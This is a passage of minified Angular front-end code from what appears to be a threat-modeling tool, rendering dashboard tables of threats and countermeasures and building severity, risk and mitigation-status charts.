100%;","appearance","fill",4,"ngIf"],["appearance","fill",2,"width","100%"],["chipList",""],["selected","",3,"ngStyle","removed","click",4,"ngFor","ngForOf"],[3,"placeholder","formControl","matAutocomplete","matChipInputFor","matChipInputSeparatorKeyCodes","matChipInputTokenEnd"],["tagInput",""],[3,"optionSelected"],["auto","matAutocomplete"],[3,"value",4,"ngFor","ngForOf"],["selected","",3,"ngStyle","removed","click"],["matChipRemove",""],["matInput","","type","color",2,"width","0px","visibility","hidden",3,"ngxMatColorPicker","ngModel","ngModelChange"],[3,"color"],["picker",""],[3,"value"],[2,"margin-right","5px"],["mat-icon-button","",2,"float","right",3,"click"]],template:function(e,i){1&e&&ne(0,C1t,23,14,"mat-form-field",0),2&e&&V("ngIf",i.tagableElement)},dependencies:[Zi,Ri,Yv,an,Ta,Ea,N4,a5,sxe,oa,da,nn,un,yr,Xa,m8,db,VF,WF,D2e,vV,Jv,Xi]}),t})(),k7=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,ff,AZ,S7]}),t})();Ds(zG,[Zi,Ri,Zh,Dp,oa,_u,gu,Nd,Hh,da,qh,V1,Mu,Uh,pf,_f,df,w5,Clt,Xlt,gT,TZ,hut,Ypt,IZ,G_t,Z_t,sgt,bgt,Ogt,Bgt,U0t,j0t,h1t],[Xi]),Ds(kG,[Zi,Ri,an,Ta,Ea,oa,Hh,da,nn,un,qh,V1,Mu,Uh,Go,Xa,Pa,b8,M8,vm,Am,Tm,Em,jp],[Xi]),Ds(lM,[Zi,Ri,an,Ac,Ta,gm,Dd,Ea,oa,br,da,nn,fp,un,jr,Nr,yr,gg,Go,Xa,ts,is,Or,Lr,rc,Xo,qo,po,el,Pa,il,Ec,Dc,tl,wl,gp,RZ,I5,KT,jg,EZ,qp,lM,cM,gM],[Xi]),Ds(cM,[Zi,Ri,an,Ac,Ta,gm,Dd,Ea,oa,da,nn,fp,un,jr,Nr,yr,gg,Go,Xa,ts,is,Or,Lr,rc,Xo,qo,po,Pa,il,Ec,Dc,tl,wl,gp,RZ,KT,T2,lM,_T,gM],[Xi]),Ds(_T,[Zi,Ri,an,Ac,Ta,gm,Dd,Ea,oa,da,nn,fp,un,jr,Nr,yr,Go,Xa,Xo,qo,po,Pa,TV,il,Ec,Dc,tl,wl,gp,jp,KT,cM],[Xi]),Ds(gM,[Zi,Ri,an,Ac,Ta,gm,Dd,Ea,oa,da,nn,fp,un,jr,Nr,yr,Go,Xa,ts,is,Or,Lr,Xo,qo,po,el,Pa,jp],[Xi]);const y1t=["threattable"],b1t=["countermeasuretable"];function M1t(t,a){1&t&&it(0,"mat-progress-spinner",38),2&t&&V("diameter",25)}function v1t(t,a){if(1&t&&(m(0,"div"),s(1,"\n          "),it(2,"app-results-chart",39),s(3,"\n        "),u()),2&t){const e=a.$implicit;ri("margin-left",a.first?"0":"10px"),C(2),V("diagram",e)}}function A1t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Number")," "))}function T1t(t,a){if(1&t&&(m(0,"td",41),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.Number," ")}}function E1t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Name")," "))}function D1t(t,a){if(1&t&&(m(0,"td",41),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.GetProperty("Name")," ")}}function x1t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Elements")," "))}function w1t(t,a){if(1&t&&(m(0,"td",41),s(1),u()),2&t){const e=a.$implicit,i=B();Ct("selected-cell",i.IsElementSelected(e)),C(1),ct(" ",i.GetTargets(e)," ")}}function I1t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.View")," "))}function R1t(t,a){if(1&t&&(m(0,"td",41),s(1),u()),2&t){const e=a.$implicit,i=B();C(1),ct(" ",i.GetViewName(e)," ")}}function S1t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Severity")," "))}function k1t(t,a){if(1&t&&(m(0,"option",43),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetSeverityTypeName(e)))}}function P1t(t,a){if(1&t){const e=Ye();m(0,"td",41),s(1,"\n                  "),m(2,"select",42),he("ngModelChange",function(n){return Me(be(e).$implicit.Severity=n)})("change",function(){return be(e),Me(B().UpdateDiagramsDelayed())}),s(3,"\n                    "),m(4,"option",43),s(5),oe(6,"translate"),u(),s(7,"\n                    "),ne(8,k1t,3,4,"option",44),s(9,"\n                  "),u(),s(10,"\n                "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("ngModel",e.Severity),C(2),V("value",0),C(1),ke(re(6,4,"properties.selectNone")),C(3),V("ngForOf",i.GetSeverityTypes())}}function O1t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Risk")," "))}function N1t(t,a){if(1&t&&(m(0,"option",43),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetSeverityTypeName(e)))}}function L1t(t,a){if(1&t){const e=Ye();m(0,"td",41),s(1,"\n                  "),m(2,"select",45),he("ngModelChange",function(n){return Me(be(e).$implicit.Risk=n)}),s(3,"\n                    "),ne(4,N1t,3,4,"option",44),s(5,"\n                  "),u(),s(6,"\n                "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("ngModel",e.Risk),C(2),V("ngForOf",i.GetSeverityTypes())}}function z1t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Status")," "))}function W1t(t,a){if(1&t&&(m(0,"option",43),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetThreatStateName(e)))}}function F1t(t,a){if(1&t){const e=Ye();m(0,"td",41),s(1,"\n                  "),m(2,"select",46),he("ngModelChange",function(n){return Me(be(e).$implicit.ThreatState=n)})("change",function(){return be(e),Me(B().UpdateDiagramsDelayed())}),s(3,"\n                    "),ne(4,W1t,3,4,"option",44),s(5,"\n                  "),u(),s(6,"\n                "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("ngModel",e.ThreatState),C(2),V("ngForOf",i.GetThreatStates())}}function V1t(t,a){1&t&&(m(0,"th",47),s(1," "),u())}function B1t(t,a){if(1&t){const e=Ye();m(0,"td",41),s(1," "),m(2,"mat-icon",48),he("click",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),oe(3,"translate"),s(4,"more_vert"),u(),s(5," "),u()}2&t&&(C(2),at("matTooltip",re(3,1,"general.More")))}function H1t(t,a){1&t&&it(0,"tr",49)}function U1t(t,a){if(1&t){const e=Ye();m(0,"tr",50),he("click",function(){const r=be(e).$implicit;return Me(B().SelectThreat(r))})("dblclick",function(n){const c=be(e).$implicit;return Me(B().OnMappingDblClick(c,n))})("contextmenu",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),s(1,"\n              "),u()}if(2&t){const e=a.$implicit;Ct("selected-entry",B().IsThreatSelected(e)),V("id",e.ID)}}function q1t(t,a){if(1&t){const e=Ye();m(0,"tr",51),s(1,"\n                "),m(2,"td",52),he("contextmenu",function(n){return be(e),Me(B().OpenContextMenu(n,null))}),s(3),oe(4,"translate"),u(),s(5,"\n              "),u()}2&t&&(C(3),ke(re(4,1,"pages.modeling.threattable.noThreats")))}function G1t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Number")," "))}function j1t(t,a){if(1&t&&(m(0,"td",41),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.Number," ")}}function Q1t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Name")," "))}function $1t(t,a){if(1&t&&(m(0,"td",41),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.GetProperty("Name")," ")}}function K1t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Targets")," "))}function X1t(t,a){if(1&t&&(m(0,"td",41),s(1),u()),2&t){const e=a.$implicit,i=B();Ct("selected-cell",i.IsElementSelected(e)),C(1),ct(" ",i.GetTargets(e)," ")}}function Y1t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.View")," "))}function J1t(t,a){if(1&t&&(m(0,"td",41),s(1),u()),2&t){const e=a.$implicit,i=B();C(1),ct(" ",i.GetViewName(e)," ")}}function Z1t(t,a){1&t&&(m(0,"th",47),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Progress")," "))}function e2t(t,a){1&t&&it(0,"mat-progress-bar",54),2&t&&V("value",B().$implicit.MitigationProcess.Progress)}function t2t(t,a){if(1&t&&(m(0,"td",41),s(1," \n                  "),ne(2,e2t,1,1,"mat-progress-bar",53),s(3,"\n                "),u()),2&t){const e=a.$implicit;C(2),V("ngIf",e.MitigationProcess)}}function i2t(t,a){1&t&&(m(0,"th",40),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Status")," "))}function a2t(t,a){if(1&t&&(m(0,"option",43),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetMitigationStateName(e)))}}function n2t(t,a){if(1&t){const e=Ye();m(0,"td",41),s(1,"\n                  "),m(2,"select",46),he("ngModelChange",function(n){return Me(be(e).$implicit.MitigationState=n)})("change",function(){return be(e),Me(B().UpdateDiagramsDelayed())}),s(3,"\n                    "),ne(4,a2t,3,4,"option",44),s(5,"\n                  "),u(),s(6,"\n                "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("ngModel",e.MitigationState),C(2),V("ngForOf",i.GetMitigationStates())}}function o2t(t,a){1&t&&(m(0,"th",47),s(1," "),u())}function r2t(t,a){if(1&t){const e=Ye();m(0,"td",41),s(1," "),m(2,"mat-icon",48),he("click",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),oe(3,"translate"),s(4,"more_vert"),u(),s(5," "),u()}2&t&&(C(2),at("matTooltip",re(3,1,"general.More")))}function s2t(t,a){1&t&&it(0,"tr",49)}function c2t(t,a){if(1&t){const e=Ye();m(0,"tr",50),he("click",function(){const r=be(e).$implicit;return Me(B().SelectCountermeasure(r))})("dblclick",function(n){const c=be(e).$implicit;return Me(B().OnMappingDblClick(c,n))})("contextmenu",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),s(1,"\n              "),u()}if(2&t){const e=a.$implicit;Ct("selected-entry",B().IsCountermeasureSelected(e)),V("id",e.ID)}}function l2t(t,a){if(1&t){const e=Ye();m(0,"tr",51),s(1,"\n                "),m(2,"td",52),he("contextmenu",function(n){return be(e),Me(B().OpenContextMenu(n,null))}),s(3),oe(4,"translate"),u(),s(5,"\n              "),u()}2&t&&(C(3),ke(re(4,1,"pages.modeling.countermeasuretable.noCountermeasures")))}function d2t(t,a){if(1&t&&(m(0,"span",57),s(1),u()),2&t){const e=B().item;C(1),ke(e.GetProperty("Name"))}}function m2t(t,a){1&t&&(m(0,"span",57),s(1),oe(2,"translate"),u()),2&t&&(C(1),ke(re(2,1,"pages.modeling.threattable.noEntrySelected")))}function u2t(t,a){if(1&t){const e=Ye();s(0,"\n          "),ne(1,d2t,2,1,"span",55),s(2," \n          "),ne(3,m2t,3,3,"span",55),s(4,"\n          "),m(5,"button",56),he("click",function(){const r=be(e).item;return Me(B().OnMappingDblClick(r))}),s(6,"\n            "),m(7,"mat-icon"),s(8,"preview"),u(),s(9,"\n            "),m(10,"span"),s(11),oe(12,"translate"),u(),s(13,"\n          "),u(),s(14,"\n          "),m(15,"button",56),he("click",function(){const r=be(e).item;return Me(B().ResetNumbers(r))}),s(16,"\n            "),m(17,"mat-icon"),s(18,"format_list_numbered"),u(),s(19,"\n            "),m(20,"span"),s(21),oe(22,"translate"),u(),s(23,"\n          "),u(),s(24," \n          "),m(25,"button",56),he("click",function(){const r=be(e).item;return Me(B().ResetReorderNumbers(r))}),s(26,"\n            "),m(27,"mat-icon"),s(28,"format_list_numbered"),u(),s(29,"\n            "),m(30,"span"),s(31),oe(32,"translate"),u(),s(33,"\n          "),u(),s(34," \n        ")}if(2&t){const e=a.item;C(1),V("ngIf",e),C(2),V("ngIf",!e),C(2),V("disabled",!e),C(6),ke(re(12,8,"pages.modeling.threattable.editEntry")),C(4),V("disabled",!e),C(6),ke(re(22,10,"pages.modeling.threattable.resetNumbers")),C(4),V("disabled",!e),C(6),ke(re(32,12,"pages.modeling.threattable.resetReorderNumbers"))}}var eo=(()=>{return(t=eo||(eo={})).Black="#000000",t.White="#FFFFFF",t.Green="#339900",t.Yellow="#FFCC00",t.Red="#FF2417",t.DarkRed="#8a0f0f",eo;var t})();let Cf=(()=>{class t{constructor(e,i,n,r,c,d){this.theme=e,this.dataService=i,this.dialog=n,this.translate=r,this.locStorage=c,this.elRef=d,this.updateDiagramsDelayCounter=0,this._attackScenarios=[],this._countermeasures=[],this.menuTopLeftPosition={x:"0",y:"0"},this.diagrams=[],this.displayedThreatColumns=["number","name","elements","view","severity","risk","status","more"],this.displayedCountermeasureColumns=["number","name","targets","view","progress","status","more"]}get isUpdatingDiagrams(){return this.updateDiagramsDelayCounter>0}get AttackScenarios(){return this._attackScenarios}set AttackScenarios(e){this._attackScenarios=e,this.dataSourceThreats=new zd(e.filter(r=>![_o.NotApplicable,_o.Duplicate].includes(r.ThreatState))),this.dataSourceThreats.sort=this.sortThreats,this.dataSourceThreats.sortingDataAccessor=(r,c)=>"number"==c?Number(r.Number):"name"==c?r.Name:"elements"==c?this.GetTargets(r):"view"==c?this.GetViewName(r):"severity"==c?r.Severity:"risk"==c?r.Risk:"status"==c?r.ThreatState:void console.error("Missing sorting header",c),this.dataSourceThreats.filterPredicate=(r,c)=>{var d,T;let k=c.trim().toLowerCase(),q=r.Name.toLowerCase().indexOf(k);return-1==q&&(q=null===(d=r.AttackVector)||void 0===d?void 0:d.Name.toLowerCase().indexOf(k)),-1==q&&(q=null===(T=this.GetTargets(r))||void 0===T?void 0:T.toLowerCase().indexOf(k)),null!=q&&-1!=q},this.sortThreats&&this.sortThreats.sortChange.emit(this.sortThreats)}get Countermeasures(){return this._countermeasures}set Countermeasures(e){this._countermeasures=e,this.dataSourceCountermeasures=new zd(e.filter(r=>![Ra.NotApplicable,Ra.Rejected,Ra.Duplicate].includes(r.MitigationState))),this.dataSourceCountermeasures.sort=this.sortCountermeasures,this.dataSourceCountermeasures.sortingDataAccessor=(r,c)=>"number"==c?Number(r.Number):"name"==c?r.Name:"targets"==c?this.GetTargets(r):"view"==c?this.GetViewName(r):"status"==c?r.MitigationState:void console.error("Missing sorting header",c),this.dataSourceCountermeasures.filterPredicate=(r,c)=>{var d,T;let k=c.trim().toLowerCase(),q=r.Name.toLowerCase().indexOf(k);return-1==q&&(q=null===(d=r.Control)||void 0===d?void 0:d.Name.toLowerCase().indexOf(k)),-1==q&&(q=null===(T=this.GetTargets(r))||void 0===T?void 0:T.toLowerCase().indexOf(k)),null!=q&&-1!=q},this.sortCountermeasures&&this.sortCountermeasures.sortChange.emit(this.sortCountermeasures)}get selectedObject(){return this._selectedObject}set selectedObject(e){this._selectedObject=e}ngAfterViewInit(){let e=()=>{setTimeout(()=>{this.AttackScenarios=this.dataService.Project.GetAttackScenariosApplicable().filter(i=>i.MappingState!=zn.Removed),this.Countermeasures=this.dataService.Project.GetCountermeasuresApplicable().filter(i=>i.MappingState!=zn.Removed),this.UpdateDiagrams()},10)};this.dataService.Project?e():this.dataService.ProjectChanged.subscribe(i=>e()),this.theme.ThemeChanged.subscribe(i=>{setTimeout(()=>{this.UpdateDiagrams()},100)})}onKeyDown(e){var i;if("TEXTAREA"!=(null===(i=document.activeElement)||void 0===i?void 0:i.tagName)){if(this.selectedObject){const n=(r,c)=>{this.selectedObject=r[c];const d=this.rows.find(T=>T.nativeElement.id===r[c].ID);null==d||d.nativeElement.scrollIntoView({block:"center",behavior:"smooth"})};if("ArrowDown"==e.key){let r=[];r=this.selectedObject instanceof Rc?this.dataSourceThreats.sortData(this.dataSourceThreats.filteredData,this.sortThreats):this.dataSourceCountermeasures.sortData(this.dataSourceCountermeasures.filteredData,this.sortThreats);const c=r.indexOf(this.selectedObject);c<r.length-1&&n(r,c+1)}else if("ArrowUp"==e.key){let r=[];r=this.selectedObject instanceof Rc?this.dataSourceThreats.sortData(this.dataSourceThreats.filteredData,this.sortThreats):this.dataSourceCountermeasures.sortData(this.dataSourceCountermeasures.filteredData,this.sortThreats);const c=r.indexOf(this.selectedObject);c>0&&n(r,c-1)}}["ArrowDown","ArrowUp"].includes(e.key)&&(e.preventDefault(),e.stopImmediatePropagation())}}UpdateDiagrams(){if(!this.dataService.Project)return;let e=(window.innerHeight-24)*this.GetSplitSize(1,0,50)/100;e=e-36-17-20-33-60;let i=(document.getElementById("diagramContainer").clientWidth-20-30)/4,n=t.CreateSeveritySummaryDiagram(this.dataService.Project,this.translate,this.theme.IsDarkMode,i,e),r=t.CreateCountermeasureSummaryDiagram(this.dataService.Project,this.translate,this.theme.IsDarkMode,i,e),c=t.CreateSeverityPerLifecycleDiagram(this.dataService.Project,this.translate,this.theme.IsDarkMode,i,e),d=t.CreateSeverityPerTypeDiagram(this.dataService.Project,this.translate,this.theme.IsDarkMode,i,e),T=t.CreateRiskSummaryDiagram(this.dataService.Project,this.translate,this.theme.IsDarkMode,i,e),k=t.CreateSeverityPerImpactCatDiagram(this.dataService.Project,this.translate,this.theme.IsDarkMode,i,e),q=[];this.dataService.Project.GetMyTagCharts().forEach(Y=>{q.push(t.CreateTagDiagram(this.dataService.Project,this.translate,this.theme.IsDarkMode,i,e,Y))}),this.diagrams=[...q,n,T,r,d,c,k]}UpdateDiagramsDelayed(){this.updateDiagramsDelayCounter++,setTimeout(()=>{this.updateDiagramsDelayCounter--,0==this.updateDiagramsDelayCounter&&this.UpdateDiagrams()},3e3)}static CreateTagDiagram(e,i,n,r,c,d){let T=[];d.MyTags.forEach(Re=>{let Fe;Fe=d.Type==ad.Severity?(Re=>{let Fe=[];return Fe.push({name:i.instant("properties.threatstate.NotSet"),value:Re.filter(Ne=>!vn.GetTypesDashboard().includes(Ne.Severity)).length}),vn.GetTypesDashboard().forEach(Ne=>{Fe.push({name:i.instant(vn.ToString(Ne)),value:Re.filter(et=>et.Severity==Ne).length})}),Fe})(e.GetAttackScenariosApplicable().filter(et=>et.MyTags.includes(Re))):d.Type==ad.Risk?(Re=>{let Fe=[];return Fe.push({name:i.instant("properties.threatstate.NotSet"),value:Re.filter(Ne=>null==Ne.Risk).length}),vn.GetTypesDashboard().forEach(Ne=>{Fe.push({name:i.instant(vn.ToString(Ne)),value:Re.filter(et=>et.Risk==Ne).length})}),Fe})(e.GetAttackScenariosApplicable().filter(et=>et.MyTags.includes(Re))):(Re=>{let Fe=[];return Sl.GetMitigationStates().filter(Ne=>Ne!=Ra.NotApplicable).forEach(Ne=>{Fe.push({name:i.instant(Sl.ToString(Ne)),value:Re.filter(et=>et.MitigationState==Ne).length})}),Fe})(e.GetCountermeasuresApplicable().filter(et=>et.MyTags.includes(Re)));let Ne={name:Re.GetProperty("Name"),series:Fe};T.push(Ne)}),T=T.filter(Re=>!Re.series.every(Fe=>0==Fe.value));let te=[t.getNeutral(n),eo.Green,eo.Yellow,eo.Red,eo.DarkRed];return d.Type==ad.Countermeasure&&(te=[eo.DarkRed,t.getNeutral(n),eo.Red,eo.Yellow,eo.Green]),{results:T,view:[r,c],scheme:{domain:te},xAxisLabel:d.Name,yAxisLabel:i.instant("pages.dashboard.NumberOfThreats")}}static CreateSeveritySummaryDiagram(e,i,n,r,c){let d=[],T=e.GetAttackScenariosApplicable(),k=Y=>{let te=[];return T=T.filter(pe=>!Y.includes(pe)),te.push({name:i.instant("properties.threatstate.NotSet"),value:Y.filter(pe=>!vn.GetTypesDashboard().includes(pe.Severity)).length}),vn.GetTypesDashboard().forEach(pe=>{te.push({name:i.instant(vn.ToString(pe)),value:Y.filter(Re=>Re.Severity==pe).length})}),te};if(e.GetDevices().forEach(Y=>{let te={name:Y.GetProperty("Name"),series:k(Y.GetAttackScenariosApplicable())};d.push(te)}),e.GetMobileApps().forEach(Y=>{let te={name:Y.GetProperty("Name"),series:k(Y.GetAttackScenariosApplicable())};d.push(te)}),e.GetDFDiagrams().forEach(Y=>{let te={name:Y.GetProperty("Name"),series:k(e.GetAttackScenariosApplicable().filter(pe=>pe.ViewID==Y.ID))};d.push(te)}),T.length>0){let Y={name:i.instant("general.Other"),series:k(T)};d.push(Y)}return d=d.filter(Y=>!Y.series.every(te=>0==te.value)),{results:d,view:[r,c],scheme:{domain:[t.getNeutral(n),eo.Green,eo.Yellow,eo.Red,eo.DarkRed]},xAxisLabel:i.instant("pages.dashboard.SeverityOverview"),yAxisLabel:i.instant("pages.dashboard.NumberOfThreats")}}static CreateRiskSummaryDiagram(e,i,n,r,c){let d=[],T=e.GetAttackScenariosApplicable(),k=Y=>{let te=[];return T=T.filter(pe=>!Y.includes(pe)),te.push({name:i.instant("properties.threatstate.NotSet"),value:Y.filter(pe=>null==pe.Risk).length}),vn.GetTypesDashboard().forEach(pe=>{te.push({name:i.instant(vn.ToString(pe)),value:Y.filter(Re=>Re.Risk==pe).length})}),te};if(e.GetDevices().forEach(Y=>{let te={name:Y.GetProperty("Name"),series:k(Y.GetAttackScenariosApplicable())};d.push(te)}),e.GetMobileApps().forEach(Y=>{let te={name:Y.GetProperty("Name"),series:k(Y.GetAttackScenariosApplicable())};d.push(te)}),e.GetDFDiagrams().forEach(Y=>{let te={name:Y.GetProperty("Name"),series:k(e.GetAttackScenariosApplicable().filter(pe=>pe.ViewID==Y.ID))};d.push(te)}),T.length>0){let Y={name:i.instant("general.Other"),series:k(T)};d.push(Y)}return d=d.filter(Y=>!Y.series.every(te=>0==te.value)),{results:d,view:[r,c],scheme:{domain:[t.getNeutral(n),eo.Green,eo.Yellow,eo.Red,eo.DarkRed]},xAxisLabel:i.instant("pages.dashboard.RiskOverview"),yAxisLabel:i.instant("pages.dashboard.NumberOfThreats")}}static CreateCountermeasureSummaryDiagram(e,i,n,r,c){let d=[],T=e.GetCountermeasuresApplicable(),k=Y=>{let te=[];return T=T.filter(pe=>!Y.includes(pe)),Sl.GetDashboardMitigationStates().forEach(pe=>{te.push({name:i.instant(Sl.ToString(pe)),value:Y.filter(Re=>Re.MitigationState==pe).length})}),te};if(e.GetDevices().forEach(Y=>{let te={name:Y.GetProperty("Name"),series:k(Y.GetCountermeasuresApplicable())};d.push(te)}),e.GetMobileApps().forEach(Y=>{let te={name:Y.GetProperty("Name"),series:k(Y.GetCountermeasuresApplicable())};d.push(te)}),e.GetDFDiagrams().forEach(Y=>{let te={name:Y.GetProperty("Name"),series:k(e.GetCountermeasuresApplicable().filter(pe=>pe.ViewID==Y.ID))};d.push(te)}),T.length>0){let Y={name:i.instant("general.Other"),series:k(T)};d.push(Y)}return d=d.filter(Y=>!Y.series.every(te=>0==te.value)),{results:d,view:[r,c],scheme:{domain:[eo.DarkRed,eo.Red,eo.Yellow,eo.Green]},xAxisLabel:i.instant("pages.dashboard.MeasureOverview"),yAxisLabel:i.instant("pages.dashboard.NumberOfCountermeasures")}}static CreateSeverityPerLifecycleDiagram(e,i,n,r,c){let d=[],T=e.GetAttackScenariosApplicable(),k=Y=>{let te=[];return T=T.filter(pe=>!Y.includes(pe)),te.push({name:i.instant("properties.threatstate.NotSet"),value:Y.filter(pe=>!vn.GetTypesDashboard().includes(pe.Severity)).length}),vn.GetTypesDashboard().forEach(pe=>{te.push({name:i.instant(vn.ToString(pe)),value:Y.filter(Re=>Re.Severity==pe).length})}),te};if(y2.GetKeys().forEach(Y=>{let te=T.filter(Re=>{var Fe;return null===(Fe=Re.AttackVector)||void 0===Fe?void 0:Fe.ThreatExploited.includes(Y)});T=T.filter(Re=>!te.includes(Re));let pe={name:i.instant(y2.ToString(Y)),series:k(te)};d.push(pe)}),T.length>0){let Y={name:i.instant("general.Other"),series:k(T)};d.push(Y)}return{results:d,view:[r,c],scheme:{domain:[t.getNeutral(n),eo.Green,eo.Yellow,eo.Red,eo.DarkRed]},xAxisLabel:i.instant("pages.dashboard.SevertiyPerLifecycle"),yAxisLabel:i.instant("pages.dashboard.NumberOfThreats")}}static CreateSeverityPerTypeDiagram(e,i,n,r,c){let d=[],T=e.GetAttackScenariosApplicable(),k=Ne=>{let et=[];return T=T.filter(ut=>!Ne.includes(ut)),et.push({name:i.instant("properties.threatstate.NotSet"),value:Ne.filter(ut=>!vn.GetTypesDashboard().includes(ut.Severity)).length}),vn.GetTypesDashboard().forEach(ut=>{et.push({name:i.instant(vn.ToString(ut)),value:Ne.filter(Ze=>Ze.Severity==ut).length})}),et},q=e.GetDevices().map(Ne=>Ne.HardwareDiagram).filter(Ne=>Ne).map(Ne=>Ne.ID),Y={name:i.instant("general.Hardware"),series:k(T.filter(Ne=>q.includes(Ne.ViewID)))};d.push(Y);let te=e.GetDevices().map(Ne=>Ne.SoftwareStack).filter(Ne=>Ne).map(Ne=>Ne.ID);te.push(...e.GetMobileApps().map(Ne=>Ne.SoftwareStack).filter(Ne=>Ne).map(Ne=>Ne.ID)),Y={name:i.instant("general.Software"),series:k(T.filter(Ne=>te.includes(Ne.ViewID)))},d.push(Y);let pe=e.GetDevices().map(Ne=>Ne.ProcessStack).filter(Ne=>Ne).map(Ne=>Ne.ID);pe.push(...e.GetMobileApps().map(Ne=>Ne.ProcessStack).filter(Ne=>Ne).map(Ne=>Ne.ID)),Y={name:i.instant("general.Process"),series:k(T.filter(Ne=>pe.includes(Ne.ViewID)))},d.push(Y);let Re=e.GetDFDiagrams().map(Ne=>Ne.ID);if(Y={name:i.instant("general.DataFlow"),series:k(T.filter(Ne=>Re.includes(Ne.ViewID)))},d.push(Y),T.length>0){let Ne={name:i.instant("general.Other"),series:k(T)};d.push(Ne)}return{results:d,view:[r,c],scheme:{domain:[t.getNeutral(n),eo.Green,eo.Yellow,eo.Red,eo.DarkRed]},xAxisLabel:i.instant("pages.dashboard.SeverityPerType"),yAxisLabel:i.instant("pages.dashboard.NumberOfThreats")}}static CreateSeverityPerImpactCatDiagram(e,i,n,r,c){let d=[],T=e.GetAttackScenariosApplicable(),k=Y=>{let te=[];return te.push({name:i.instant("properties.threatstate.NotSet"),value:Y.filter(pe=>!vn.GetTypesDashboard().includes(pe.Severity)).length}),vn.GetTypesDashboard().forEach(pe=>{te.push({name:i.instant(vn.ToString(pe)),value:Y.filter(Re=>Re.Severity==pe).length})}),te};return Vs.GetKeys().forEach(Y=>{let te=T.filter(Re=>Re.SystemThreats.some(Fe=>Fe.ImpactCats.includes(Y))),pe={name:i.instant(Vs.ToString(Y)),series:k(te)};d.push(pe)}),d=d.filter(Y=>!Y.series.every(te=>0==te.value)),{results:d,view:[r,c],scheme:{domain:[t.getNeutral(n),eo.Green,eo.Yellow,eo.Red,eo.DarkRed]},xAxisLabel:i.instant("pages.dashboard.SeverityPerImpactCategory"),yAxisLabel:i.instant("pages.dashboard.NumberOfThreats")}}static getNeutral(e){return e?eo.White:eo.Black}OpenTagCharts(){this.dialog.OpenTagChartsDialog().subscribe(()=>{this.UpdateDiagrams()})}GetSplitSize(e,i,n){let r=this.locStorage.Get(si.PAGE_DASHBOARD_SPLIT_SIZE_X+e.toString());return null!=r?Number(JSON.parse(r)[i]):n}OnSplitSizeChange(e,i){this.locStorage.Set(si.PAGE_DASHBOARD_SPLIT_SIZE_X+i.toString(),JSON.stringify(e.sizes)),this.UpdateDiagrams()}OnMappingDblClick(e,i=null){e instanceof Rc?this.dialog.OpenAttackScenarioDialog(e,!1,this.dataSourceThreats.sortData(this.dataSourceThreats.filteredData,this.sortThreats)):e instanceof Jl&&(i&&i.target&&"progress"==this.displayedCountermeasureColumns[i.target.cellIndex]&&e.MitigationProcess?this.dialog.OpenMitigationProcessDialog(e.MitigationProcess,!1):this.dialog.OpenCountermeasureDialog(e,!1,[],this.dataSourceCountermeasures.sortData(this.dataSourceCountermeasures.filteredData,this.sortCountermeasures)))}ApplyThreatFilter(e){this.dataSourceThreats.filter=e.target.value.trim().toLowerCase()}ApplyCountermeasureFilter(e){this.dataSourceCountermeasures.filter=e.target.value.trim().toLowerCase()}IsThreatSelected(e){return this.selectedObject==e}SelectThreat(e){this.selectedObject=e}IsCountermeasureSelected(e){return this.selectedObject==e}SelectCountermeasure(e){this.selectedObject=e}IsElementSelected(e){return e&&this.selectedObject&&this.selectedObject.Targets.some(i=>e.Targets.includes(i))}GetViewName(e){var i,n;let r=null===(i=this.dataService.Project.GetDiagrams().find(c=>c.ID==e.ViewID))||void 0===i?void 0:i.Name;return r||(r=null===(n=this.dataService.Project.GetStacks().find(c=>c.ID==e.ViewID))||void 0===n?void 0:n.Name),r}GetTargets(e){return e.Targets.filter(i=>i).map(i=>i.GetProperty("Name")).join(", ")}GetThreatStates(){return ku.GetThreatStates()}GetThreatStateName(e){return ku.ToString(e)}GetSeverityTypes(){return vn.GetTypesDashboard()}GetSeverityTypeName(e){return 